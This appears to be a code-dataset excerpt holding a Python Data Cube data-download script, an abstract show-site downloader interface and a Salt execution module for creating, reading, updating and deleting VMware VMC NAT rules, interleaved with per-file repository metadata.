        tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)
        tempfile_name = tf.name
        try:
            chunk_read(response, tf, report_hook=chunk_report)
        finally:
            tf.close()
    # handle errors
    except HTTPError as e:
        print("HTTP Error:", e.code, data_file)
        if tempfile_name is not None:
            os.remove(tempfile_name)  # fix: don't leak a partial temp file
        return False
    except URLError as e:
        print("URL Error:", e.reason, data_file)
        if tempfile_name is not None:
            os.remove(tempfile_name)  # fix: don't leak a partial temp file
        return False
    # Move into place and return the file size.
    shutil.copy(tempfile_name, data_file)
    os.remove(tempfile_name)
    return os.path.getsize(data_file)
# chunk_report taken from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
# chunk_report taken from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
def chunk_report(bytes_so_far, chunk_size, total_size):
    """Progress hook: overwrite one status line with download percentage."""
    pct = round(float(bytes_so_far) / total_size * 100, 2)
    sys.stdout.write("Downloaded %d of %d bytes (%0.2f%%)\r" % (bytes_so_far, total_size, pct))
    # Terminate the status line once the transfer is complete.
    if bytes_so_far >= total_size:
        sys.stdout.write('\n')
# chunk_read modified from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
def chunk_read(response, local_file, chunk_size=8192, report_hook=None):
    # Stream `response` into `local_file` in `chunk_size` pieces and return the
    # total number of bytes read.  `report_hook(bytes_so_far, chunk_size,
    # total_size)` is called after each chunk when provided.
    try:
        # Python 2 style header access (kept from the original recipe).
        total_size = response.info().getheader('Content-Length').strip()
    except AttributeError:
        # Python 3: the response object exposes getheader() directly.
        total_size = response.getheader('Content-Length').strip()
    total_size = int(total_size)
    bytes_so_far = 0
    while 1:
        chunk = response.read(chunk_size)
        try:
            local_file.write(chunk)
        except TypeError:
            # Text-mode target: decode the bytes first.
            # NOTE(review): assumes local_file has an `encoding` attribute — confirm.
            local_file.write(chunk.decode(local_file.encoding))
        bytes_so_far += len(chunk)
        # Empty chunk means EOF; the (empty) write above is a harmless no-op.
        if not chunk:
            break
        if report_hook:
            report_hook(bytes_so_far, chunk_size, total_size)
    return bytes_so_far
if __name__ == "__main__":
    # Make sure we can write to the Data Cube root directory.
    if os.access("/datacube", os.W_OK) is False:
        print("Data Cube root path is not writeable - please ensure that the path '/datacube' exists and is writeable.")
        exit(-1)
    try:
        os.makedirs(base_data_path)
    except OSError:
        # Best effort: narrowed from a bare `except:`; the directory most
        # likely exists already.
        pass
    print("Starting data download. When complete, a list of instructions will be provided for the next steps.")
    # Running totals for the summary printed at the end.
    total_bytes = 0
    total_time = 0
    count = 0
    success = []
    failed = []
    skipped = []
    # The database dump is fetched first but deliberately excluded from the
    # per-file statistics below (its return value was previously assigned to
    # `size` and immediately overwritten — dead assignment removed).
    download_file(database_dump_file, 1, 1)
    for data_file in files:
        count += 1
        start = time.time()
        size = download_file(data_file, count, len(files))
        end = time.time()
        # stats:
        if size is None:
            skipped.append(data_file)
        elif size is not False:
            # Download was good!
            elapsed = end - start
            # Clamp to 1s so the rate computation never divides by ~zero.
            elapsed = 1.0 if elapsed < 1 else elapsed
            rate = (size / 1024**2) / elapsed
            print("Downloaded {0}b in {1:.2f}secs, Average Rate: {2:.2f}mb/sec".format(size, elapsed, rate))
            # add up metrics
            total_bytes += size
            total_time += elapsed
            success.append({'file': data_file, 'size': size})
        else:
            print("There was a problem downloading {0}".format(data_file))
            failed.append(data_file)
    # Print summary:
    print("Download Summary")
    print("Successes: {0} files, {1} bytes ".format(len(success), total_bytes))
    if len(failed) > 0:
        print("Failures: {0} files".format(len(failed)))
    if len(skipped) > 0:
        print(" Skipped: {0} files".format(len(skipped)))
    if len(success) > 0:
        print(" Average Rate: {0:.2f}mb/sec".format((total_bytes / 1024.0**2) / total_time))
    print("Requirements:")
    print(
        " An initialized Data Cube database named 'datacube'. More info found at https://github.com/ceos-seo/data_cube_ui/blob/master/docs/datacube_install.md"
    )
    print(" A database role named 'dc_user' that has read/write access to 'datacube'")
    print("Next steps:")
    print(
        " Import the newly created database dump by running 'psql -U dc_user datacube < {}'".format(database_dump_file))
    print(" Verify the import by running 'datacube -v product list'. There should be two entries.")
| 55.655052
| 159
| 0.78376
| 2,058
| 15,973
| 5.682702
| 0.126336
| 0.166909
| 0.208636
| 0.302522
| 0.744335
| 0.738435
| 0.733989
| 0.729201
| 0.729201
| 0.720222
| 0
| 0.24458
| 0.119201
| 15,973
| 286
| 160
| 55.84965
| 0.58668
| 0.029926
| 0
| 0.04661
| 0
| 0.016949
| 0.709432
| 0.625323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012712
| false
| 0.004237
| 0.04661
| 0
| 0.080508
| 0.09322
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
58c9c2501498b30b471ec75271ca5364fb8df703
| 201
|
py
|
Python
|
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
src/show_site/ShowSite.py
|
shadow999/showdownloader
|
237ff682f32b0017498f64d5a1225af1fa299325
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
class ShowSite(ABC):
    """Interface for sites that show episodes can be downloaded from."""

    @abstractmethod
    def get_download_link(self, search_string: str, episode_search_string: str, episode: int = None) -> str:
        """Return the download URL for the episode matched by the given search strings."""
| 25.125
| 108
| 0.721393
| 26
| 201
| 5.384615
| 0.692308
| 0.242857
| 0.214286
| 0.314286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19403
| 201
| 7
| 109
| 28.714286
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0.2
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
450ecf8031bcf2ec196a25461a4d160f56847278
| 21,569
|
py
|
Python
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
kdsalvy/salt-ext-modules-vmware-1
|
9fdc941692e4c526f575f33b2ce23c1470582934
|
[
"Apache-2.0"
] | 10
|
2021-11-02T20:24:44.000Z
|
2022-03-11T05:54:27.000Z
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
waynew/salt-ext-modules-vmware
|
9f693382772061676c846c850df6ff508b7f3a91
|
[
"Apache-2.0"
] | 83
|
2021-10-01T15:13:02.000Z
|
2022-03-31T16:22:40.000Z
|
src/saltext/vmware/modules/vmc_nat_rules.py
|
waynew/salt-ext-modules-vmware
|
9f693382772061676c846c850df6ff508b7f3a91
|
[
"Apache-2.0"
] | 15
|
2021-09-30T23:17:27.000Z
|
2022-03-23T06:54:22.000Z
|
"""
Salt execution module for nat rules
Provides methods to Create, Update, Read and Delete nat rules.
"""
import logging
import os
from saltext.vmware.utils import vmc_constants
from saltext.vmware.utils import vmc_request
from saltext.vmware.utils import vmc_templates
log = logging.getLogger(__name__)
__virtualname__ = "vmc_nat_rules"
def __virtual__():
return __virtualname__
def _create_payload_for_nat_rule(rule_id, user_input):
    """Build the request payload for a nat rule from the shared template.

    ``id`` and ``display_name`` are both forced to ``rule_id`` so the rule is
    displayed under the same identifier it is addressed by.
    """
    payload = vmc_request.create_payload_for_request(vmc_templates.create_nat_rules, user_input)
    payload["id"] = rule_id
    payload["display_name"] = rule_id
    return payload
def get(
    hostname,
    refresh_key,
    authorization_host,
    org_id,
    sddc_id,
    tier1,
    nat,
    verify_ssl=True,
    cert=None,
    cursor=None,
    page_size=None,
    sort_by=None,
    sort_ascending=None,
):
    """
    Retrieves nat rules for Given SDDC

    CLI Example:

    .. code-block:: bash

        salt vm_minion vmc_nat_rules.get hostname=nsxt-manager.local domain_id=mgw ...

    hostname
        The host name of NSX-T manager

    refresh_key
        refresh_key to get access token

    authorization_host
        hostname to get access token

    org_id
        org_id of the SDDC

    sddc_id
        sddc_id for which nat rules should be retrieved

    tier1
        tier1 option are cgw and user defined tier1

    nat
        nat option are USER

    verify_ssl
        (Optional) Option to enable/disable SSL verification. Enabled by default.
        If set to False, the certificate validation is skipped.

    cert
        (Optional) Path to the SSL certificate file to connect to NSX-T manager.
        The certificate can be retrieved from browser.

    cursor
        (Optional) Opaque cursor to be used for getting next page of records (supplied by current result page)

    page_size
        (Optional) Maximum number of results to return in this page. Default page size is 1000.

    sort_by
        (Optional) Field by which records are sorted

    sort_ascending
        (Optional) Boolean value to sort result in ascending order. Enabled by default.
    """
    log.info("Retrieving nat rules for SDDC %s", sddc_id)
    url_template = (
        "{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
        "policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules"
    )
    api_url = url_template.format(
        base_url=vmc_request.set_base_url(hostname),
        org_id=org_id,
        sddc_id=sddc_id,
        tier1=tier1,
        nat=nat,
    )
    # Forward only the pagination/sorting kwargs the API understands.
    params = vmc_request._filter_kwargs(
        allowed_kwargs=["cursor", "page_size", "sort_ascending", "sort_by"],
        cursor=cursor,
        page_size=page_size,
        sort_by=sort_by,
        sort_ascending=sort_ascending,
    )
    return vmc_request.call_api(
        method=vmc_constants.GET_REQUEST_METHOD,
        url=api_url,
        refresh_key=refresh_key,
        authorization_host=authorization_host,
        description="vmc_nat_rule.get",
        verify_ssl=verify_ssl,
        cert=cert,
        params=params,
    )
def get_by_id(
    hostname,
    refresh_key,
    authorization_host,
    org_id,
    sddc_id,
    tier1,
    nat,
    nat_rule,
    verify_ssl=True,
    cert=None,
):
    """
    Retrieves specific nat rule for Given SDDC

    CLI Example:

    .. code-block:: bash

        salt vm_minion vmc_nat_rules.get_by_id hostname=nsxt-manager.local tier1=cgw ...

    hostname
        The host name of NSX-T manager

    refresh_key
        refresh_key to get access token

    authorization_host
        hostname to get access token

    org_id
        org_id of the SDDC

    sddc_id
        sddc_id for which nat rules should be retrieved

    tier1
        tier1 option are cgw and user defined tier1

    nat
        nat option are USER/default/Internal

    nat_rule
        id of specific nat rule

    verify_ssl
        (Optional) Option to enable/disable SSL verification. Enabled by default.
        If set to False, the certificate validation is skipped.

    cert
        (Optional) Path to the SSL certificate file to connect to NSX-T manager.
        The certificate can be retrieved from browser.
    """
    log.info("Retrieving nat rule %s for SDDC %s", nat_rule, sddc_id)
    url_template = (
        "{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
        "policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
    )
    api_url = url_template.format(
        base_url=vmc_request.set_base_url(hostname),
        org_id=org_id,
        sddc_id=sddc_id,
        tier1=tier1,
        nat=nat,
        nat_rule=nat_rule,
    )
    return vmc_request.call_api(
        method=vmc_constants.GET_REQUEST_METHOD,
        url=api_url,
        refresh_key=refresh_key,
        authorization_host=authorization_host,
        description="vmc_nat_rule.get_by_id",
        verify_ssl=verify_ssl,
        cert=cert,
    )
def delete(
    hostname,
    refresh_key,
    authorization_host,
    org_id,
    sddc_id,
    tier1,
    nat,
    nat_rule,
    verify_ssl=True,
    cert=None,
):
    """
    Delete nat rules for Given SDDC

    CLI Example:

    .. code-block:: bash

        salt vm_minion vmc_nat_rules.delete hostname=nsxt-manager.local tier1=cgw ...

    hostname
        The host name of NSX-T manager

    refresh_key
        refresh_key to get access token

    authorization_host
        hostname to get access token

    org_id
        org_id of the SDDC

    sddc_id
        sddc_id for which nat rules should be deleted

    tier1
        tier1 option are cgw and user defined tier1

    nat
        nat option are USER/default/Internal

    nat_rule
        id of specific nat rule

    verify_ssl
        (Optional) Option to enable/disable SSL verification. Enabled by default.
        If set to False, the certificate validation is skipped.

    cert
        (Optional) Path to the SSL certificate file to connect to NSX-T manager.
        The certificate can be retrieved from browser.
    """
    log.info("Deleting nat rule %s for SDDC %s", nat_rule, sddc_id)
    url_template = (
        "{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
        "policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
    )
    api_url = url_template.format(
        base_url=vmc_request.set_base_url(hostname),
        org_id=org_id,
        sddc_id=sddc_id,
        tier1=tier1,
        nat=nat,
        nat_rule=nat_rule,
    )
    return vmc_request.call_api(
        method=vmc_constants.DELETE_REQUEST_METHOD,
        url=api_url,
        refresh_key=refresh_key,
        authorization_host=authorization_host,
        description="vmc_nat_rule.delete",
        # DELETE responses carry no body worth parsing.
        responsebody_applicable=False,
        verify_ssl=verify_ssl,
        cert=cert,
    )
def create(
    hostname,
    refresh_key,
    authorization_host,
    org_id,
    sddc_id,
    tier1,
    nat,
    nat_rule,
    verify_ssl=True,
    cert=None,
    action=None,
    destination_network=None,
    source_network=None,
    translated_network=None,
    translated_ports=vmc_constants.VMC_NONE,
    scope=None,
    service=None,
    enabled=None,
    firewall_match=None,
    logging=None,
    description=None,
    tags=vmc_constants.VMC_NONE,
    sequence_number=None,
):
    """
    Create nat rules for Given SDDC

    CLI Example:

    .. code-block:: bash

        salt vm_minion vmc_nat_rules.create hostname=nsxt-manager.local tier1=cgw ...

    hostname
        The host name of NSX-T manager

    refresh_key
        refresh_key to get access token

    authorization_host
        hostname to get access token

    org_id
        org_id of the SDDC

    sddc_id
        sddc_id for which nat rules should be created

    tier1
        tier1 option are cgw and user defined tier1

    nat
        nat option are USER/default/Internal

    nat_rule
        id of specific nat rule

    verify_ssl
        (Optional) Option to enable/disable SSL verification. Enabled by default.
        If set to False, the certificate validation is skipped.

    cert
        (Optional) Path to the SSL certificate file to connect to NSX-T manager.
        The certificate can be retrieved from browser.

    action
        specify type of nat rule it can have value REFLEXIVE, DNAT
        REFLEXIVE nat rule require
            source_network
            translated_network
            service should be empty
            translated_ports should be None
            destination_network should be none
        DNAT Rule require
            destination_network
            translated_network
            translated_ports can be none
            service can be none
            source_network can be None or input network.

    destination_network
        Represents the destination network
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    source_network
        Represents the source network address
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    translated_network
        Represents the translated network address
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    translated_ports
        Port number or port range
        Please note, if there is service configured in this nat rule, the translated_port
        will be realized on NSX Manager as the destination_port. If there is no sevice configured,
        the port will be ignored.

    scope
        (Optional) Array of policy paths of labels, ProviderInterface, NetworkInterface
        If this value is not passed, then ["/infra/labels/cgw-public"] will be used by default.

    service
        (Optional) Represents the service on which the nat rule will be applied
        If this value is not passed, then empty string will be used by default.

    enabled
        (Optional) Policy nat rule enabled flag
        The flag, which suggests whether the nat rule is enabled or
        disabled. The default is True.

    firewall_match
        (Optional) Represents the firewall match flag
        It indicates how the firewall matches the address after nating if firewall
        stage is not skipped.
        possible values: MATCH_EXTERNAL_ADDRESS, MATCH_INTERNAL_ADDRESS
        Default: "MATCH_INTERNAL_ADDRESS"

    logging
        (Optional) Policy nat rule logging flag
        default: False

    description
        (Optional) Description of nat rule

    tags
        (Optional) Opaque identifiers meaningful to the API user. Maximum 30 tags can be associated:

        .. code-block::

            tags='[
                {
                    "tag": "<tag-key-1>"
                    "scope": "<tag-value-1>"
                },
                {
                    "tag": "<tag-key-2>"
                    "scope": "<tag-value-2>"
                }
            ]'

    sequence_number
        (Optional) Sequence number of the nat rule
        The sequence_number decides the rule_priority of a nat rule.
        default: 0
        type: int

    Example values:

    .. code-block::

        {
            "action": "REFLEXIVE",
            "translated_network": "10.182.171.36",
            "translated_ports": null,
            "destination_network": "",
            "source_network": "192.168.1.23",
            "sequence_number": 0,
            "service": "",
            "logging": false,
            "enabled": false,
            "scope": [
                "/infra/labels/cgw-public"
            ],
            "tags": [
                {
                    "tag": "tag1",
                    "scope": "scope1"
                }
            ],
            "description": "",
            "firewall_match": "MATCH_INTERNAL_ADDRESS"
        }

    Please refer the `Nat Rule <https://developer.vmware.com/docs/nsx-vmc-policy/latest/data-structures/InlinePolicyNatRule1/>`_ to get insight of input parameters.
    """
    log.info("Creating nat rule %s for SDDC %s ", nat_rule, sddc_id)
    api_url_base = vmc_request.set_base_url(hostname)
    api_url = (
        "{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
        "policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
    )
    api_url = api_url.format(
        base_url=api_url_base,
        org_id=org_id,
        sddc_id=sddc_id,
        tier1=tier1,
        nat=nat,
        nat_rule=nat_rule,
    )
    # Candidate payload fields; most default to None, while translated_ports
    # and tags use the VMC_NONE sentinel so an explicit user-supplied None can
    # be distinguished from "not provided".
    allowed_dict = {
        "action": action,
        "description": description,
        "destination_network": destination_network,
        "scope": scope,
        "service": service,
        "source_network": source_network,
        "tags": tags,
        "translated_network": translated_network,
        "translated_ports": translated_ports,
        "enabled": enabled,
        "firewall_match": firewall_match,
        "logging": logging,
        "sequence_number": sequence_number,
    }
    # allow_none lets translated_ports/tags pass through as literal None (the
    # API accepts null for these); all other None values are dropped.
    req_data = vmc_request._filter_kwargs(
        allowed_kwargs=allowed_dict.keys(), allow_none=["translated_ports", "tags"], **allowed_dict
    )
    # Merge the filtered user input into the rule template and PUT it; the
    # rule id doubles as the display name.
    data = _create_payload_for_nat_rule(nat_rule, req_data)
    return vmc_request.call_api(
        method=vmc_constants.PUT_REQUEST_METHOD,
        url=api_url,
        refresh_key=refresh_key,
        authorization_host=authorization_host,
        description="vmc_nat_rule.create",
        data=data,
        verify_ssl=verify_ssl,
        cert=cert,
    )
def update(
    hostname,
    refresh_key,
    authorization_host,
    org_id,
    sddc_id,
    tier1,
    nat,
    nat_rule,
    verify_ssl=True,
    cert=None,
    action=None,
    destination_network=None,
    source_network=None,
    translated_network=None,
    translated_ports=vmc_constants.VMC_NONE,
    scope=None,
    service=None,
    enabled=None,
    firewall_match=None,
    logging=None,
    description=None,
    tags=vmc_constants.VMC_NONE,
    sequence_number=None,
    display_name=None,
):
    """
    Update nat rule for given SDDC.

    This is a partial update (HTTP PATCH): the existing rule is fetched first
    and only the fields explicitly passed by the caller are changed; all other
    fields keep their current values. If the existing rule cannot be fetched,
    the error result from that lookup is returned unchanged.

    CLI Example:

    .. code-block:: bash

        salt vm_minion vmc_nat_rules.update hostname=nsxt-manager.local tier1=cgw ...

    hostname
        The host name of NSX-T manager

    refresh_key
        refresh_key to get access token

    authorization_host
        hostname to get access token

    org_id
        org_id of the SDDC

    sddc_id
        sddc_id for which nat rules should be updated

    tier1
        tier1 option are cgw and user defined tier1

    nat
        nat option are USER/default/Internal

    nat_rule
        id of specific nat rule

    verify_ssl
        (Optional) Option to enable/disable SSL verification. Enabled by default.
        If set to False, the certificate validation is skipped.

    cert
        (Optional) Path to the SSL certificate file to connect to NSX-T manager.
        The certificate can be retrieved from browser.

    action
        specify type of nat rule, it can have value REFLEXIVE or DNAT

        REFLEXIVE nat rule requires
            source_network
            translated_network
            service should be empty
            translated_ports should be None
            destination_network should be None

        DNAT rule requires
            destination_network
            translated_network
            translated_ports can be None
            service can be None
            source_network can be None or input network.

    destination_network
        Represents the destination network.
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    source_network
        Represents the source network address.
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    translated_network
        Represents the translated network address.
        This supports single IP address or comma separated list of single IP
        addresses or CIDR. This does not support IP range or IP sets.

    translated_ports
        Port number or port range.
        Please note, if there is a service configured in this nat rule, the
        translated_port will be realized on NSX Manager as the destination_port.
        If there is no service configured, the port will be ignored.

    scope
        (Optional) Array of policy paths of labels, ProviderInterface, NetworkInterface.
        If this value is not passed, then ["/infra/labels/cgw-public"] will be used by default.

    service
        (Optional) Represents the service on which the nat rule will be applied.
        If this value is not passed, then empty string will be used by default.

    enabled
        (Optional) Policy nat rule enabled flag.
        The flag, which suggests whether the nat rule is enabled or
        disabled. The default is True.

    firewall_match
        (Optional) Represents the firewall match flag.
        It indicates how the firewall matches the address after NATing if the
        firewall stage is not skipped.
        Possible values: MATCH_EXTERNAL_ADDRESS, MATCH_INTERNAL_ADDRESS
        Default: "MATCH_INTERNAL_ADDRESS"

    logging
        (Optional) Policy nat rule logging flag.
        default: False

    description
        (Optional) Description of nat rule

    tags
        (Optional) Opaque identifiers meaningful to the API user. Maximum 30 tags can be associated:

        .. code-block::

            tags='[
                {
                    "tag": "<tag-key-1>"
                    "scope": "<tag-value-1>"
                },
                {
                    "tag": "<tag-key-2>"
                    "scope": "<tag-value-2>"
                }
            ]'

    sequence_number
        (Optional) Sequence number of the nat rule.
        The sequence_number decides the rule_priority of a nat rule.
        default: 0
        type: int

    display_name
        Identifier to use when displaying entity in logs or GUI

    Example values:

    .. code-block::

        {
            "action": "REFLEXIVE",
            "translated_network": "10.182.171.36",
            "translated_ports": null,
            "destination_network": "",
            "source_network": "192.168.1.23",
            "sequence_number": 0,
            "service": "",
            "logging": false,
            "enabled": false,
            "scope": [
                "/infra/labels/cgw-public"
            ],
            "tags": [
                {
                    "tag": "tag1",
                    "scope": "scope1"
                }
            ],
            "description": "",
            "firewall_match": "MATCH_INTERNAL_ADDRESS"
        }

    Please refer to the `Nat Rule <https://developer.vmware.com/docs/nsx-vmc-policy/latest/data-structures/InlinePolicyNatRule1/>`_ to get insight of input parameters.
    """
    log.info("Updating Nat rule %s for SDDC %s ", nat_rule, sddc_id)
    api_url_base = vmc_request.set_base_url(hostname)
    api_url = (
        "{base_url}vmc/reverse-proxy/api/orgs/{org_id}/sddcs/{sddc_id}/"
        "policy/api/v1/infra/tier-1s/{tier1}/nat/{nat}/nat-rules/{nat_rule}"
    )
    api_url = api_url.format(
        base_url=api_url_base,
        org_id=org_id,
        sddc_id=sddc_id,
        tier1=tier1,
        nat=nat,
        nat_rule=nat_rule,
    )
    # Fetch the existing rule so unspecified fields keep their current values
    # when the update payload is assembled below.
    existing_data = get_by_id(
        hostname,
        refresh_key,
        authorization_host,
        org_id,
        sddc_id,
        tier1,
        nat,
        nat_rule,
        verify_ssl,
        cert,
    )
    if vmc_constants.ERROR in existing_data:
        # The rule could not be retrieved; surface the lookup error as-is.
        return existing_data
    allowed_dict = {
        "action": action,
        "description": description,
        "destination_network": destination_network,
        "scope": scope,
        "service": service,
        "source_network": source_network,
        "tags": tags,
        "translated_network": translated_network,
        "translated_ports": translated_ports,
        "enabled": enabled,
        "firewall_match": firewall_match,
        "logging": logging,
        "sequence_number": sequence_number,
        "display_name": display_name,
    }
    # Drop parameters the caller did not supply; translated_ports and tags use
    # the VMC_NONE sentinel as their default, so an explicit None from the
    # caller is still forwarded for those two fields.
    req_data = vmc_request._filter_kwargs(
        allowed_kwargs=allowed_dict.keys(), allow_none=["translated_ports", "tags"], **allowed_dict
    )
    # Merge the caller's changes over the existing rule using the update template.
    payload = vmc_request.create_payload_for_request(
        vmc_templates.update_nat_rules, req_data, existing_data
    )
    return vmc_request.call_api(
        method=vmc_constants.PATCH_REQUEST_METHOD,
        url=api_url,
        refresh_key=refresh_key,
        authorization_host=authorization_host,
        description="vmc_nat_rules.update",
        responsebody_applicable=False,
        data=payload,
        verify_ssl=verify_ssl,
        cert=cert,
    )
| 27.546616
| 164
| 0.616904
| 2,657
| 21,569
| 4.820474
| 0.105382
| 0.036071
| 0.013117
| 0.023189
| 0.893114
| 0.887883
| 0.873829
| 0.867036
| 0.860009
| 0.852983
| 0
| 0.007706
| 0.314155
| 21,569
| 782
| 165
| 27.581841
| 0.858109
| 0.564143
| 0
| 0.721429
| 0
| 0.017857
| 0.161109
| 0.081304
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.017857
| 0.003571
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.